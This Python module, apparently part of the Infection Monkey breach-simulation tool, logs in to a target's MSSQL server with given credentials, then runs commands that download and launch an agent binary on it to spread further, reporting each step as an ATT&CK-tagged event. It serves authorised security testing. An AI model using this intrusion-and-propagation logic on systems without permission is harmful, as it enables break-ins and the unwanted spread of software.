from logging import getLogger
from time import time
from typing import Set, Tuple

from common.agent_events import ExploitationEvent, PropagationEvent
from common.credentials import Credentials
from common.event_queue import IAgentEventPublisher
from common.tags import (
    BRUTE_FORCE_T1110_TAG,
    COMMAND_AND_SCRIPTING_INTERPRETER_T1059_TAG,
    EXPLOITATION_OF_REMOTE_SERVICES_T1210_TAG,
    INGRESS_TOOL_TRANSFER_T1105_TAG,
)
from common.types import AgentID, Event, NetworkPort
from infection_monkey.i_puppet import TargetHost

from .mssql_client import MSSQLClient
from .mssql_options import MSSQLOptions

# Tag identifying every event published by this exploiter.
MSSQL_EXPLOITER_TAG = "mssql-exploiter"

# Tags attached to the ExploitationEvent published for the MSSQL login attempt.
EXPLOITATION_TAGS = (
    MSSQL_EXPLOITER_TAG,
    BRUTE_FORCE_T1110_TAG,
    EXPLOITATION_OF_REMOTE_SERVICES_T1210_TAG,
)

# Tags attached to the PropagationEvent published for the download-and-launch attempt.
PROPAGATION_TAGS = (
    MSSQL_EXPLOITER_TAG,
    COMMAND_AND_SCRIPTING_INTERPRETER_T1059_TAG,
    INGRESS_TOOL_TRANSFER_T1105_TAG,
)

logger = getLogger(name=__name__)


class MSSQLExploitClient:
    """
    Exploit a host over MSSQL and, if that succeeds, propagate the agent to it.

    Each phase publishes an event through the injected publisher: an ExploitationEvent for
    the login attempt and, only when the login succeeded, a PropagationEvent for the
    download-and-launch attempt.
    """

    def __init__(
        self,
        exploiter_name: str,
        agent_id: AgentID,
        agent_event_publisher: IAgentEventPublisher,
        mssql_client: MSSQLClient,
    ):
        """
        :param exploiter_name: The name recorded as `exploiter_name` on published events
        :param agent_id: The ID of this agent, recorded as the `source` of published events
        :param agent_event_publisher: The publisher used for exploitation and propagation
            events
        :param mssql_client: The client used to log in to the server and run commands on it
        """
        self._exploiter_name = exploiter_name
        self._agent_id = agent_id
        self._agent_event_publisher = agent_event_publisher
        self._client = mssql_client

    def exploit_host(
        self,
        host: TargetHost,
        options: MSSQLOptions,
        credentials: Credentials,
        download_agent_command: str,
        launch_agent_command: str,
        agent_binary_downloaded: Event,
        ports_to_try: Set[NetworkPort],
    ) -> Tuple[bool, bool]:
        """
        Exploit the host over MSSQL using the given credentials, then attempt to propagate.

        Propagation is attempted only if the MSSQL login succeeds.

        :param host: The host to exploit
        :param options: The MSSQL exploiter options; `agent_binary_download_timeout` bounds
            how long to wait for the agent binary to be downloaded
        :param credentials: The credentials to use
        :param download_agent_command: The command to download the agent binary
        :param launch_agent_command: The command to launch the agent binary
        :param agent_binary_downloaded: An event that will be set when the agent binary
            is downloaded
        :param ports_to_try: The ports passed to the MSSQL client when logging in
        :return: A tuple of (exploitation_success, propagation_success);
            propagation_success is always False when exploitation fails
        """
        exploitation_success = self._exploit(host, ports_to_try, credentials)
        if not exploitation_success:
            logger.debug("Exploitation was unsuccessful, did not attempt propagation")
            return (False, False)

        propagation_success = self._propagate(
            host,
            download_agent_command,
            launch_agent_command,
            agent_binary_downloaded,
            options.agent_binary_download_timeout,
        )

        return exploitation_success, propagation_success

    def _exploit(
        self, host: TargetHost, ports_to_try: Set[NetworkPort], credentials: Credentials
    ) -> bool:
        """
        Attempt to log in to the MSSQL server on the host and publish an ExploitationEvent.

        Login errors are not raised; they are reported through the event's error message.

        :return: True if the login succeeded, False otherwise
        """
        exploitation_message = ""
        exploitation_success = True

        # Captured before the attempt, so the event is stamped with when the login started
        timestamp = time()
        try:
            self._client.login(host.ip, ports_to_try, credentials)
        except Exception as err:
            exploitation_message = f"Failed to login to MSSQL server on {host.ip}: {err}"
            exploitation_success = False
            logger.debug(exploitation_message)

        self._publish_exploitation_event(
            host, timestamp, exploitation_success, exploitation_message
        )

        return exploitation_success

    def _propagate(
        self,
        host: TargetHost,
        download_agent_command: str,
        launch_agent_command: str,
        agent_binary_downloaded: Event,
        agent_binary_download_timeout: float,
    ) -> bool:
        """
        Download and launch the agent on the host, then publish a PropagationEvent.

        The launch command is run only if `agent_binary_downloaded` is set within
        `agent_binary_download_timeout`. Errors raised while running either command are
        not propagated; they are reported through the event's error message.

        :return: True if the launch command was run without error, False otherwise
        """
        propagation_message = ""
        propagation_success = True

        timestamp = time()
        try:
            # TODO: Roll download & run into a single command?
            self._client.run_command(download_agent_command)

            logger.debug("Waiting for the target to download the agent binary...")
            if agent_binary_downloaded.wait(agent_binary_download_timeout):
                self._client.run_command(launch_agent_command)
            else:
                propagation_success = False
                propagation_message = "Agent binary download timed out"
        except Exception as err:
            propagation_success = False
            propagation_message = str(err)

        if not propagation_success:
            logger.debug("Propagation to %s failed: %s", host.ip, propagation_message)

        self._publish_propagation_event(host, timestamp, propagation_success, propagation_message)
        return propagation_success

    def _publish_exploitation_event(
        self, host: TargetHost, timestamp: float, success: bool, message: str
    ):
        """Publish an ExploitationEvent for `host` tagged with EXPLOITATION_TAGS."""
        self._agent_event_publisher.publish(
            ExploitationEvent(
                source=self._agent_id,
                target=host.ip,
                timestamp=timestamp,
                tags=frozenset(EXPLOITATION_TAGS),
                success=success,
                exploiter_name=self._exploiter_name,
                error_message=message,
            )
        )

    def _publish_propagation_event(
        self, host: TargetHost, timestamp: float, success: bool, message: str
    ):
        """Publish a PropagationEvent for `host` tagged with PROPAGATION_TAGS."""
        self._agent_event_publisher.publish(
            PropagationEvent(
                source=self._agent_id,
                target=host.ip,
                timestamp=timestamp,
                tags=frozenset(PROPAGATION_TAGS),
                success=success,
                exploiter_name=self._exploiter_name,
                error_message=message,
            )
        )
